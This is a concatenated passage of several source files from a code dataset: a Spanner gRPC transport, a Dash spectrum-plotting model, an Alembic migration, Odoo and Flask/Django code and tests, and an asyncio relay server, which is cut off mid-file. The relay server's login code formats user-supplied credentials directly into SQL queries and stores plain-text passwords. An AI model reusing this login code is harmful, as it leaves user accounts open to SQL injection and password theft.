providing both will raise an exception.\n credentials (google.auth.credentials.Credentials): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n address (str): The address where the service is hosted.\n \"\"\"\n # If both `channel` and `credentials` are specified, raise an\n # exception (channels come with credentials baked in already).\n if channel is not None and credentials is not None:\n raise ValueError(\n 'The `channel` and `credentials` arguments are mutually '\n 'exclusive.', )\n\n # Create the channel.\n if channel is None:\n channel = self.create_channel(\n address=address,\n credentials=credentials,\n )\n\n # gRPC uses objects called \"stubs\" that are bound to the\n # channel and provide a basic method for each RPC.\n self._stubs = {\n 'spanner_stub': spanner_pb2_grpc.SpannerStub(channel),\n }\n\n @classmethod\n def create_channel(cls,\n address='spanner.googleapis.com:443',\n credentials=None):\n \"\"\"Create and return a gRPC channel object.\n\n Args:\n address (str): The host for the channel to use.\n credentials (~.Credentials): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If\n none are specified, the client will attempt to ascertain\n the credentials from the environment.\n\n Returns:\n grpc.Channel: A gRPC channel object.\n \"\"\"\n grpc_gcp_config = grpc_gcp.api_config_from_text_pb(\n pkg_resources.resource_string(__name__, _SPANNER_GRPC_CONFIG))\n options = [(grpc_gcp.API_CONFIG_CHANNEL_ARG, grpc_gcp_config)]\n return google.api_core.grpc_helpers.create_channel(\n address,\n credentials=credentials,\n scopes=cls._OAUTH_SCOPES,\n )\n\n @property\n def create_session(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Creates a new session. A session can be used to perform\n transactions that read and/or modify data in a Cloud Spanner database.\n Sessions are meant to be reused for many consecutive\n transactions.\n\n Sessions can only execute one transaction at a time. To execute\n multiple concurrent read-write/write-only transactions, create\n multiple sessions. Note that standalone reads and queries use a\n transaction internally, and count toward the one transaction\n limit.\n\n Cloud Spanner limits the number of sessions that can exist at any given\n time; thus, it is a good idea to delete idle and/or unneeded sessions.\n Aside from explicit deletes, Cloud Spanner can delete sessions for which no\n operations are sent for more than an hour. If a session is deleted,\n requests to it return ``NOT_FOUND``.\n\n Idle sessions can be kept alive by sending a trivial SQL query\n periodically, e.g., ``\\\"SELECT 1\\\"``.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].CreateSession\n\n @property\n def get_session(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Gets a session. Returns ``NOT_FOUND`` if the session does not exist.\n This is mainly useful for determining whether a session is still\n alive.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].GetSession\n\n @property\n def list_sessions(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Lists all sessions in a given database.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].ListSessions\n\n @property\n def delete_session(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Ends a session, releasing server resources associated with it.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].DeleteSession\n\n @property\n def execute_sql(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Executes an SQL statement, returning all results in a single reply. This\n method cannot be used to return a result set larger than 10 MiB;\n if the query yields more data than that, the query fails with\n a ``FAILED_PRECONDITION`` error.\n\n Operations inside read-write transactions might return ``ABORTED``. If\n this occurs, the application should restart the transaction from\n the beginning. See ``Transaction`` for more details.\n\n Larger result sets can be fetched in streaming fashion by calling\n ``ExecuteStreamingSql`` instead.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].ExecuteSql\n\n @property\n def execute_streaming_sql(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Like ``ExecuteSql``, except returns the result\n set as a stream. Unlike ``ExecuteSql``, there\n is no limit on the size of the returned result set. However, no\n individual row in the result set can exceed 100 MiB, and no\n column value can exceed 10 MiB.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].ExecuteStreamingSql\n\n @property\n def read(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Reads rows from the database using key lookups and scans, as a\n simple key/value style alternative to\n ``ExecuteSql``. This method cannot be used to\n return a result set larger than 10 MiB; if the read matches more\n data than that, the read fails with a ``FAILED_PRECONDITION``\n error.\n\n Reads inside read-write transactions might return ``ABORTED``. If\n this occurs, the application should restart the transaction from\n the beginning. See ``Transaction`` for more details.\n\n Larger result sets can be yielded in streaming fashion by calling\n ``StreamingRead`` instead.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].Read\n\n @property\n def streaming_read(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Like ``Read``, except returns the result set as a\n stream. Unlike ``Read``, there is no limit on the\n size of the returned result set. However, no individual row in\n the result set can exceed 100 MiB, and no column value can exceed\n 10 MiB.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].StreamingRead\n\n @property\n def begin_transaction(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Begins a new transaction. This step can often be skipped:\n ``Read``, ``ExecuteSql`` and\n ``Commit`` can begin a new transaction as a\n side-effect.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].BeginTransaction\n\n @property\n def commit(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Commits a transaction. The request includes the mutations to be\n applied to rows in the database.\n\n ``Commit`` might return an ``ABORTED`` error. This can occur at any time;\n commonly, the cause is conflicts with concurrent\n transactions. However, it can also happen for a variety of other\n reasons. If ``Commit`` returns ``ABORTED``, the caller should re-attempt\n the transaction from the beginning, re-using the same session.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].Commit\n\n @property\n def rollback(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Rolls back a transaction, releasing any locks it holds. It is a good\n idea to call this for any transaction that includes one or more\n ``Read`` or ``ExecuteSql`` requests and\n ultimately decides not to commit.\n\n ``Rollback`` returns ``OK`` if it successfully aborts the transaction, the\n transaction was already aborted, or the transaction is not\n found. ``Rollback`` never returns ``ABORTED``.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].Rollback\n\n @property\n def partition_query(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Creates a set of partition tokens that can be used to execute a query\n operation in parallel. Each of the returned partition tokens can be used\n by ``ExecuteStreamingSql`` to specify a subset\n of the query result to read. The same session and read-only transaction\n must be used by the PartitionQueryRequest used to create the\n partition tokens and the ExecuteSqlRequests that use the partition tokens.\n\n Partition tokens become invalid when the session used to create them\n is deleted, is idle for too long, begins a new transaction, or becomes too\n old. When any of these happen, it is not possible to resume the query, and\n the whole operation must be restarted from the beginning.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].PartitionQuery\n\n @property\n def partition_read(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Creates a set of partition tokens that can be used to execute a read\n operation in parallel. Each of the returned partition tokens can be used\n by ``StreamingRead`` to specify a subset of the read\n result to read. The same session and read-only transaction must be used by\n the PartitionReadRequest used to create the partition tokens and the\n ReadRequests that use the partition tokens. There are no ordering\n guarantees on rows returned among the returned partition tokens, or even\n within each individual StreamingRead call issued with a partition_token.\n\n Partition tokens become invalid when the session used to create them\n is deleted, is idle for too long, begins a new transaction, or becomes too\n old. When any of these happen, it is not possible to resume the read, and\n the whole operation must be restarted from the beginning.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].PartitionRead\n","sub_path":"spanner/google/cloud/spanner_v1/gapic/transports/spanner_grpc_transport.py","file_name":"spanner_grpc_transport.py","file_ext":"py","file_size_in_byte":14385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"410717403","text":"import re\n\nimport dash_html_components as html\nimport dash_table\nimport pandas as pd\nfrom flask_login import current_user\nfrom plotly import graph_objs as go\nfrom plotly.colors import DEFAULT_PLOTLY_COLORS\n\nfrom dashboards.dashboard_model import DashboardModel\nfrom data_tools.wrappers.collections import get_collection\n\n\nclass VisualizationModel(DashboardModel):\n _redis_prefix = 'viz'\n _empty_plot_data = {}\n\n def get_plot(self, queries, group_by, labels, theme, bin_collection_id, legend_style, background_color):\n print(background_color)\n labels = labels or []\n self.load_dataframes()\n if bin_collection_id is not None:\n print(bin_collection_id)\n bin_collection = get_collection(current_user, bin_collection_id)\n x_mins = bin_collection.get_dataset('x_min').ravel().tolist()\n x_maxes = bin_collection.get_dataset('x_max').ravel().tolist()\n colors = [DEFAULT_PLOTLY_COLORS[i % 2] for i in range(len(x_mins))]\n shapes = [\n go.layout.Shape(\n type='rect',\n xref='x',\n yref='paper',\n x0=x_min,\n y0=0,\n x1=x_max,\n y1=1,\n fillcolor=color,\n opacity=0.2,\n layer='below',\n line_width=0\n )\n for x_min, x_max, color in zip(x_mins, x_maxes, colors)\n ]\n else:\n shapes = []\n\n axis_line_style = {\n 'zerolinecolor': '#375A7F', # darkly primary\n 'gridcolor': '#444444' # darkly secondary\n } if theme == 'plotly_dark' and background_color != 'rgba(255,255,255,1)' else {\n 'zerolinecolor': '#2C3E50', # flatly primary\n 'gridcolor': '#95A5A6' # flatly secondary\n }\n if legend_style in ('full', 'groups'):\n layout = go.Layout(\n height=700,\n font={'size': 16},\n margin={'t': 25, 'l': 25, 'b': 25, 'r': 25},\n template=theme,\n plot_bgcolor=background_color,\n paper_bgcolor=background_color,\n xaxis={\n 'title': 'Chemical Shift (ppm)',\n 'autorange': 'reversed',\n **axis_line_style\n },\n yaxis={\n 'title': 'Intensity',\n **axis_line_style\n },\n shapes=shapes\n )\n else: # if legend_style == 'none'\n layout = go.Layout(\n height=700,\n font={'size': 16},\n margin={'t': 25, 'l': 25, 'b': 25, 'r': 25},\n template=theme,\n plot_bgcolor=background_color,\n paper_bgcolor=background_color,\n xaxis={\n 'title': 'Chemical Shift (ppm)',\n 'autorange': 'reversed',\n **axis_line_style\n },\n yaxis={\n 'title': 'Intensity',\n **axis_line_style\n },\n shapes=shapes,\n showlegend=False\n )\n\n color_indices = [self._label_df.query(query).index for query in queries]\n if len(color_indices) > len(DEFAULT_PLOTLY_COLORS): # repeat default color list\n colors = []\n while len(colors) < len(color_indices):\n colors += DEFAULT_PLOTLY_COLORS\n else:\n colors = DEFAULT_PLOTLY_COLORS\n colors = colors[:len(color_indices)]\n x = self._numeric_df.columns.values.astype(float)\n figure = go.Figure(layout=layout)\n\n if legend_style == 'full' or legend_style == 'groups':\n figure.add_trace(\n go.Scatter( # dummy series to use as stand-in for legend title\n x=[0],\n y=[0],\n name=','.join(group_by),\n mode='markers',\n marker={\n 'opacity': 0,\n 'size': 0,\n 'color': 'rgba(0,0,0,0)'\n }\n )\n )\n\n for query, color in zip(queries, colors):\n # split query\n figure.add_trace(\n go.Scatter( # dummy series to label colors\n x=[0],\n y=[0],\n name=','.join(re.findall(r'[\"](\\w+)[\"]', query)), # pretty kludgy\n mode='lines',\n marker={'color': color},\n legendgroup=query\n )\n )\n\n figure.add_trace(\n go.Scatter( # dummy series to provide space between color key and \"heading\"\n x=[0],\n y=[0],\n name='',\n mode='markers',\n marker={\n 'opacity': 0,\n 'size': 0,\n 'color': 'rgba(0,0,0,0)'\n }\n )\n )\n\n if legend_style == 'full':\n figure.add_trace(\n go.Scatter( # dummy series to use as stand-in for legend title\n x=[0],\n y=[0],\n name=f\"({', '.join(labels)})\" if len(labels) else 'Spectrum #',\n mode='markers',\n marker={\n 'opacity': 0,\n 'size': 0,\n 'color': 'rgba(0,0,0,0)'\n }\n )\n )\n\n for query, color in zip(queries, colors):\n y_values = self._numeric_df.loc[self._label_df.query(query).index]\n for i, row in y_values.iterrows():\n text = '
'.join([f'{label}=={self._label_df.loc[i][label]}' for label in self._label_df.columns])\n if len(labels):\n name = f\"({', '.join([f'{self._label_df.loc[i][label]}' for label in labels])})\"\n else:\n name = f'({i})'\n if legend_style == 'groups':\n figure.add_trace(\n go.Scatter(\n x=x,\n y=row,\n text=text,\n name=','.join(re.findall(r'[\"](\\w+)[\"]', query)), # pretty kludgy\n mode='lines',\n marker={'color': color, 'size': 1},\n legendgroup=query,\n showlegend=False\n )\n )\n else:\n figure.add_trace(\n go.Scatter(\n x=x,\n y=row,\n text=text,\n name=name,\n mode='lines',\n marker={'color': color, 'size': 2},\n showlegend=(legend_style == 'full')\n )\n )\n\n return figure\n\n def get_summary(self, queries, labels, x_min, x_max, theme):\n labels = labels or []\n self.load_dataframes()\n in_range_columns = [column for column in self._numeric_df.columns if x_min <= float(column) <= x_max]\n # find sum of points in range\n # average and median sum\n results_dfs = []\n label_column = f'({\", \".join(labels)})'\n for query in queries:\n results_df = pd.DataFrame()\n sub_label_df = self._label_df.query(query)\n sub_numeric_df = self._numeric_df.loc[sub_label_df.index]\n sums = sub_numeric_df[in_range_columns].sum(axis=1)\n results_df[label_column] = sub_label_df.apply(\n lambda row: f'({\",\".join([str(row[label]) for label in labels])})', axis=1)\n results_df['Sum'] = sums\n summary_df = pd.DataFrame()\n summary_df[label_column] = [f'Average({query})', f'Median({query})']\n summary_df['Sum'] = [sums.mean(), sums.median()]\n results_df = summary_df.append(results_df)\n results_dfs.append(results_df)\n style_header = {'backgroundColor': '#303030'} if theme == 'plotly_dark' else {}\n style_cell = {'backgroundColor': '#444444'} if theme == 'plotly_dark' else {}\n\n return [item for pair in [\n (html.H5(query),\n dash_table.DataTable(columns=[{'name': val, 'id': val} for val in df.columns],\n data=df.to_dict('rows'),\n style_header=style_header,\n style_cell=style_cell,\n style_data_conditional=[\n {\n 'if': {'row_index': 0},\n 'fontStyle': 'italic'\n },\n {\n 'if': {'row_index': 1},\n 'fontStyle': 'italic'\n }\n ]),\n html.Br()\n )\n for query, df in zip(queries, results_dfs)\n ] for item in pair]\n","sub_path":"omics/omics_dashboard/dashboards/nmr_metabolomics/visualization/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596977797","text":"\"\"\"Comments table\n\nRevision ID: b3b3d1fcb7df\nRevises: 16cb4dfd7a31\nCreate Date: 2020-04-29 01:40:10.978734\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b3b3d1fcb7df'\ndown_revision = '16cb4dfd7a31'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('comment',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('comment', sa.String(length=64), nullable=True),\n sa.Column('trans_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['trans_id'], ['transaction.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('comment')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/b3b3d1fcb7df_comments_table.py","file_name":"b3b3d1fcb7df_comments_table.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"424322745","text":"# -*- coding: utf-8 -*-\nimport base64\nimport json\nimport logging\n\nfrom psycopg2 import IntegrityError\n\nfrom odoo import http\nfrom odoo.http import request\n\n_logger = logging.getLogger(__name__)\n\nclass GhuDoctoralStudent(http.Controller):\n @http.route('/campus/student/doctoral-program/', type='http', auth='user', methods=['GET'], website=True)\n def showAllDoctoralPrograms(self, **kwargs):\n # Show all doctorands of student\n partner_id = request.env.user.partner_id.id\n student = request.env['ghu.student'].sudo().search([('partner_id', '=', partner_id)], limit=1)\n programs = request.env['ghu.doctoral_program'].sudo().search(\n [('student_ref', '=', 'ghu.student,'+str(student.id))])\n if programs:\n return http.request.render('ghu.campus_student_doctoral_program_list', {\n 'programs': programs\n })\n return http.request.not_found()\n\n @http.route('/campus/student/doctoral-program/', type='http', auth='user', methods=['GET'], website=True)\n def showProgram(self, obj, **kwargs):\n partner_id = request.env.user.partner_id.id\n student = request.env['ghu.student'].sudo().search([('partner_id', '=', partner_id)], limit=1)\n if obj.student_ref.id == student.id:\n return http.request.render('ghu.campus_student_doctoral_program_overview', {\n 'program': obj\n })\n return http.request.not_found()\n\n \n\n","sub_path":"addons/ghu/controllers/campus/student/doctoral_program/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"254874460","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask\nfrom flask.ext.login import LoginManager\n\nfrom .models import db, User\nfrom .views import module\n\n__all__ = ('create_app',)\n\n\ndef _init_db(app):\n db.app = app\n db.init_app(app)\n\n\ndef _init_jinja(app):\n pass\n\n\ndef _init_login(app):\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.user_loader(User.get)\n login_manager.login_view = '/signin'\n\n\ndef create_app(name=None):\n if name is None:\n name = __name__\n\n app = Flask(name)\n app.config.from_object('config')\n\n _init_db(app)\n _init_jinja(app)\n _init_login(app)\n\n app.register_blueprint(module)\n return app\n","sub_path":"apps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"576212815","text":"start = 1016\nstop = 7937\npositive = 3\nnegative = (7, 17, 19, 27)\nmax_val = -1\ncount = 0\n\nfor i in range(start, stop + 1):\n result = i % positive == 0\n if result:\n for j in negative:\n result = result and i % j > 0\n else:\n continue\n if result:\n count += 1\n max_val = max(max_val, i)\n\nprint(count, max_val)","sub_path":"17_task/17_27414/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"112018919","text":"from doc.files import read_csv_file, write_csv_file\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\n\n\ndef create_test_user():\n args = dict(username='TEST_DUDE', email='me@here.com', password='secret')\n user = get_user_model().objects.filter(username='TEST_DUDE')\n if user:\n user = user[0]\n else:\n user = get_user_model().objects.create_user(**args)\n return user, args\n\n\nclass TestAccountsData(TestCase):\n\n def test_accounts(self):\n self.user, self.user_args = create_test_user()\n self.assertEqual(self.user.email, 'me@here.com')\n self.assertEqual(len(User.objects.all()), 1)\n\n def test_string(self):\n self.user, self.user_args = create_test_user()\n self.assertEqual(str(self.user), 'TEST_DUDE')\n\n\nclass TestAccountsViews(TestCase):\n\n def test_home_view(self):\n response = self.client.get('/accounts/')\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'theme.html')\n\n def test_login_view(self):\n response = self.client.get('/accounts/login')\n self.assertEqual(response.status_code, 301)\n self.assertEqual(response.url, '/accounts/login/')\n\n response = self.client.get('/accounts/login/')\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'theme.html')\n\n def test_logout_view(self):\n response = self.client.get('/accounts/logout/')\n self.assertEqual(response.status_code, 302)\n self.assertEqual(response.url, reverse('home'))\n\n def test_signup_view(self):\n response = self.client.get('/accounts/signup')\n self.assertEqual(response.status_code, 301)\n self.assertEqual(response.url, reverse('signup'))\n\n response = self.client.get(reverse('signup'))\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'theme.html')\n\n\nclass TableTest(TestCase):\n\n def test_read_csv(self):\n table = read_csv_file('Documents/markseaman.info/Test/animals.csv')\n self.assertEqual(table, [['1', 'Dog'], ['2', 'Cat'], ['3', 'Bird'], ['4', 'Fish']])\n\n def test_write_csv(self):\n table = read_csv_file('Documents/markseaman.info/Test/animals.csv')\n self.assertEqual(table, [['1', 'Dog'], ['2', 'Cat'], ['3', 'Bird'], ['4', 'Fish']])\n write_csv_file('Documents/markseaman.info/Test/animals.csv', table)\n table = read_csv_file('Documents/markseaman.info/Test/animals.csv')\n self.assertEqual(table, [['1', 'Dog'], ['2', 'Cat'], ['3', 'Bird'], ['4', 'Fish']])\n","sub_path":"doc/tests_accounts.py","file_name":"tests_accounts.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"140954607","text":"import asyncio\nimport hashlib\nimport re\nimport os\nimport random\nimport json\nimport ssl\nimport sqlite3\nimport concurrent.futures\nfrom config.config import *\nfrom xmlrpc.server import SimpleXMLRPCServer\n\nuser_list = {} # 存储已连接上的用户\nserver_list = {}\nrules = []\n\n\ndef create_sqlite_db():\n con = sqlite3.connect(\"user.db\")\n cur = con.cursor()\n sql = \"CREATE TABLE IF NOT EXISTS user(id INTEGER PRIMARY KEY,username TEXT,password TEXT,email TEXT)\"\n cur.execute(sql)\n return con, cur\n\n\ndef transfer_json(msg, method):\n \"\"\"字符串与json格式互相转换\"\"\"\n if method:\n return json.dumps(msg)\n else:\n return json.loads(msg)\n\n\nasync def connect_dest_server(dest_addr, local_reader, local_writer, dest_reader, dest_writer):\n try:\n local_addr = local_writer.get_extra_info('peername') # 请求者的ip,port\n request_msg = {'local_addr': local_addr, 'request_addr': dest_addr, 'code': 'Request connection'} # 给客户端的请求连接信息\n request_msg = transfer_json(request_msg, method=True)\n # print('发送给目标客户端的连接请求'+request_msg)\n\n dest_writer.write(request_msg.encode()) # 给目标客户端发送连接请求\n await dest_writer.drain()\n try:\n ensure_connection = await dest_reader.read(500)\n ensure_connection = transfer_json(ensure_connection.decode(), method=False)\n\n if ensure_connection['code'] == 'Accept connection':\n try:\n connect_success = {'local_addr': local_addr, 'request_addr': dest_addr, 'code': 'Ready'}\n connect_success = transfer_json(connect_success, method=True)\n local_writer.write(connect_success.encode())\n await local_writer.drain()\n print('请求成功:' + str(local_addr) + '正在与' + str(dest_addr) + '通讯...\\n')\n dest = {'addr': dest_addr, 'Reader': dest_reader, 'Writer': dest_writer}\n return dest\n except ConnectionResetError:\n # print('已断开用户连接:', local_addr)\n return False\n except Exception as e:\n print('0',e)\n elif ensure_connection['code'] == 'Refuse connection':\n try:\n connect_fail = {'local_addr': local_addr, 'request_addr': dest_addr, 'code': 'No'}\n connect_fail = transfer_json(connect_fail, method=True)\n local_writer.write(connect_fail.encode())\n await local_writer.drain()\n print('请求失败:' + str(dest_addr) + '拒绝与' + str(local_addr) + '通讯...\\n')\n dest_writer.close()\n local_writer.close()\n return False\n except Exception as e:\n print('1',e)\n else:\n pass\n except Exception as e:\n print('2',e)\n pass\n\n except Exception as e:\n print('3',e)\n pass\n\n\ndef hold_user_info(ip, addr, reader, writer):\n \"\"\"存储已连接客户端的相关内容\"\"\"\n user = {'addr': addr, 'Reader': reader, 'Writer': writer}\n user_list[ip] = user\n\n\ndef hold_server_info(ip, addr, reader, writer):\n \"\"\"存储已连接目标服务器(客户端)的相关内容\"\"\"\n user = {'addr': addr, 'Reader': reader, 'Writer': writer}\n server_list[ip] = user\n\n\nasync def server_authenticate(reader, writer, secret_key):\n \"\"\"客户端合法认证\"\"\"\n message = os.urandom(32) # 随机产生 n=32 个字节的字符串\n writer.write(message)\n await writer.drain()\n s = hashlib.sha512()\n s.update(message + secret_key.encode('utf-8')) # 加密\n digest = s.hexdigest()\n response = await reader.read(1024)\n if digest == response.decode('utf-8'):\n client_addr = writer.get_extra_info('peername')\n client_addr_str = str(client_addr[0]) + str(client_addr[1]) # 拼接ip和port\n hold_user_info(client_addr_str, client_addr, reader, writer)\n print('\\n客户端:' + str(client_addr) + '连接成功\\n')\n return digest\n else:\n writer.write('connection_error'.encode()) # 若连接失败,发送错误信息\n writer.close()\n\n\nasync def user_login(reader, writer):\n\n global search_result, account\n try:\n search_result = None\n account = await reader.read(1024)\n account = transfer_json(account.decode(), False)\n sql = \"select * from user where username = '{}' and password = '{}'\".format(account['username'],\n account['password'])\n cur.execute(sql)\n search_result = cur.fetchall()\n except sqlite3.OperationalError:\n search_result = False\n except ssl.SSLError:\n search_result = False\n\n if search_result:\n print('\\n用户' + account['username'] + '登陆成功!\\n')\n writer.write('Login Success'.encode())\n await writer.drain()\n return True\n else:\n writer.write('Need Email'.encode())\n await writer.drain()\n email = await reader.read(1024)\n verify_email = re.match(r'^[0-9a-zA-Z_]{0,19}@[0-9a-zA-Z]{1,13}\\.[com,cn,net]{1,3}(.cn)?$', email.decode())\n if verify_email:\n email = verify_email.group()\n sql = \"insert into user(username,password,email) values ('{}','{}','{}')\".format(\n str(account['username']), str(account['password']), str(email))\n try:\n cur.execute(sql)\n con.commit()\n print('\\n用户' + account['username'] + '注册成功!\\n')\n writer.write('Register Success'.encode())\n await writer.drain()\n return True\n except Exception as e:\n writer.write('Register Fail'.encode())\n await writer.drain()\n return False\n else:\n writer.write('Register Fail'.encode())\n await writer.drain()\n return False\n\n\ndef creat_server_ssl():\n ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\n ssl_ctx.options |= ssl.OP_NO_TLSv1\n ssl_ctx.options |= ssl.OP_NO_TLSv1_1\n ssl_ctx.options |= ssl.OP_SINGLE_DH_USE\n ssl_ctx.options |= ssl.OP_SINGLE_ECDH_USE\n ssl_ctx.load_cert_chain(certfile='./server_ssl/mycertfile.pem', keyfile='./server_ssl/mykeyfile.pem')\n ssl_ctx.load_verify_locations(cafile='./server_ssl/mycertfile.pem')\n ssl_ctx.check_hostname = False\n ssl_ctx.verify_mode = ssl.VerifyMode.CERT_REQUIRED\n ssl_ctx.set_ciphers('ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384')\n return ssl_ctx\n\n\ndef set_rule(rule_json):\n global rule\n rule = json.loads(rule_json)\n rules.append(rule)\n rpc_server.server_close()\n return rule_json\n\n\ndef RPC_server(rpc_port):\n global rpc_server\n # port = 0\n rpc_server = SimpleXMLRPCServer(('localhost', rpc_port)) # 初始化\n rpc_server.register_function(set_rule, \"set_rule\") # 注册函数\n print(\"等待RPC规则配置......\")\n try:\n rpc_server.handle_request() # 保持等待调用状态\n print('配置完成......')\n except OSError:\n print('配置完成......')\n return rule\n\n\nasync def handle_echo(reader, writer):\n client_addr = writer.get_extra_info('peername')\n connect_result = await server_authenticate(reader, writer, SECRET_KEY) # 用户合法性验证\n if not connect_result:\n print('客户端:' + str(client_addr) + '连接失败')\n writer.close()\n return\n try:\n login_result = await user_login(reader, writer)\n if not login_result:\n user_list.pop(str(client_addr[0]) + str(client_addr[1]))\n print('已断开用户连接:', client_addr)\n writer.close()\n return\n except ConnectionResetError:\n user_list.pop(str(client_addr[0]) + str(client_addr[1]))\n print('用户已断开连接:', client_addr)\n writer.close()\n return\n except ssl.SSLError as e:\n return\n\n rpc_port = random.randint(49995,50000)\n # await asyncio.sleep(0.01)\n rpc_port = 12039\n # print(rpc_port)\n writer.write(str(rpc_port).encode())\n await writer.drain()\n\n loop = asyncio.get_running_loop()\n with concurrent.futures.ProcessPoolExecutor() as pool:\n config_rule = await loop.run_in_executor(pool, RPC_server, rpc_port)\n # config_rule = RPC_server()\n\n ident, src_ip, src_port, dst_ip, dst_port = \\\n config_rule['ident'], config_rule['src_ip'], config_rule['src_port'],config_rule['dst_ip'],config_rule['dst_port'],\n\n # 此处设置要访问的默认服务器\n dst_ip = Client_Ip[0]\n dst_port = Client_Port[0]\n l_reader, l_writer = await asyncio.open_connection(dst_ip, dst_port)\n server_addr = l_writer.get_extra_info('peername')\n server_addr_str = str(server_addr[0]) + str(server_addr[1])\n hold_server_info(server_addr_str, server_addr, l_reader, l_writer) # 将处理目标客户端(服务器)的请求信息存起来\n # print(server_list)\n\n try:\n # dest_ip = await reader.read(100) # 首先需要得到客户端的请求ip\n # dest_ip = dest_ip.decode()\n dest_ip = server_addr # 此处设置默认连接server_addr\n\n print('正在请求:' + str(client_addr) + '请求目的ip:' + str(dest_ip))\n find_dest = await connect_dest_server(dest_ip, reader, writer, l_reader, l_writer)\n\n if find_dest:\n\n config_rule['ident'] = 'hi'\n config_rule_json = json.dumps(config_rule)\n writer.write(config_rule_json.encode())\n await writer.drain()\n # print(config_rule)\n\n s_reader = find_dest['Reader']\n s_writer = find_dest['Writer']\n while True:\n data = await reader.read(100)\n message = data.decode()\n if message == 'Heart beat!':\n writer.write(message.encode())\n print('心跳响应' + message)\n continue\n\n if message == '' or message == 'exit':\n message = 'Disconnect Request'\n s_writer.write(message.encode())\n await s_writer.drain()\n\n re_msg = await s_reader.read(1024)\n if re_msg.decode() == 'ByeBye':\n writer.write(re_msg)\n await writer.drain()\n user_list.pop(str(client_addr[0]) + str(client_addr[1]))\n print('用户已断开连接:', client_addr)\n 